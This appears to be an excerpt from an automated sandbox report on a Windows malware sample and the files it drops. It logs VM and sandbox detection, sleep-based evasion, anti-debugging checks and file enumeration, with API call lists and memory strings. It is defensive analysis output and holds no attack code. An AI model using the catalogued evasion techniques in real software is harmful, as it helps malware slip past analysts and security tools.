Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\1607186572092.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1607186588295.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100202D0 4_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04F05AA0 21_2_04F05AA0
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to read device registry values (via SetupAPI)
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 4_2_10019780
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Jump to dropped file
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04F05AA0 21_2_04F05AA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100202D0 4_2_100202D0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5536 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5604 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 4744 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748 Thread sleep time: -62000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 5688 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h 4_2_100223C0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h 4_2_100223C0
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose, 0_2_6E660F62
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose, 0_2_6E651C23
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 1_2_0121A534
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123A928 FindFirstFileExA, 1_2_0123A928
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 1_2_0122B820
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00402D09 FindFirstFileA, 4_2_00402D09
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_0040693B
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_004066CC FindFirstFileA,FindClose, 4_2_004066CC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001A170 FindFirstFileA,FindClose, 4_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose, 21_2_026DC704
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8, 21_2_026E1F70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose, 21_2_04FA7950
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FA5A90 FindFirstFileA,FindClose, 21_2_04FA5A90
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122DBC8 VirtualQuery,GetSystemInfo, 1_2_0122DBC8
Source: 1E1C360C582DF797.exe, 00000015.00000003.563174149.0000000005D84000.00000004.00000001.sdmp Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 1E1C360C582DF797.exe, 00000015.00000003.552028868.0000000005D11000.00000004.00000001.sdmp Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551853011.0000000005D84000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 1E1C360C582DF797.exe, 00000015.00000003.549908726.0000000005D11000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware Virtual disk 2.0
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware
Source: 1E1C360C582DF797.exe, 00000015.00000003.549962480.000000000415C000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter ID
Source: 1E1C360C582DF797.exe, 00000015.00000003.551997697.0000000005D36000.00000004.00000001.sdmp Binary or memory string: SystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: C:\Users\user\AppData\Roaming\1607186572092.exe Process information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent, 4_2_10019FF0
Hides threads from debuggers
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process queried: DebugFlags Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E6652CE
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E65041D OutputDebugStringA,GetLastError, 0_2_6E65041D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E672571 mov eax, dword ptr fs:[00000030h] 0_2_6E672571
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6780EB mov eax, dword ptr fs:[00000030h] 0_2_6E6780EB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01237363 mov eax, dword ptr fs:[00000030h] 1_2_01237363
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00404C06 mov eax, dword ptr fs:[00000030h] 4_2_00404C06
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019DE0 mov eax, dword ptr fs:[00000030h] 4_2_10019DE0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h] 4_2_10019E13
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h] 4_2_10019E13
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h] 4_2_10019E70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h] 4_2_10019E70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019ED0 mov eax, dword ptr fs:[00000030h] 4_2_10019ED0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E631660 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,CloseHandle,GetProcessHeap,HeapFree, 0_2_6E631660
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E65FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E65FB78
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E6652CE
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122EEB3 SetUnhandledExceptionFilter, 1_2_0122EEB3
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122F07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0122F07B
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012384EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_012384EF
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122ED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0122ED65
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_0040825D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0040825D
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10015354 SetUnhandledExceptionFilter,__encode_pointer, 4_2_10015354
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10015376 __decode_pointer,SetUnhandledExceptionFilter, 4_2_10015376
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 4_2_10018413
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_1000E44D
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026EBE0B SetUnhandledExceptionFilter, 21_2_026EBE0B
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026EBDF7 SetUnhandledExceptionFilter, 21_2_026EBDF7
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E83315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_04E83315
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E86CE8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_04E86CE8
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E88D22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_04E88D22
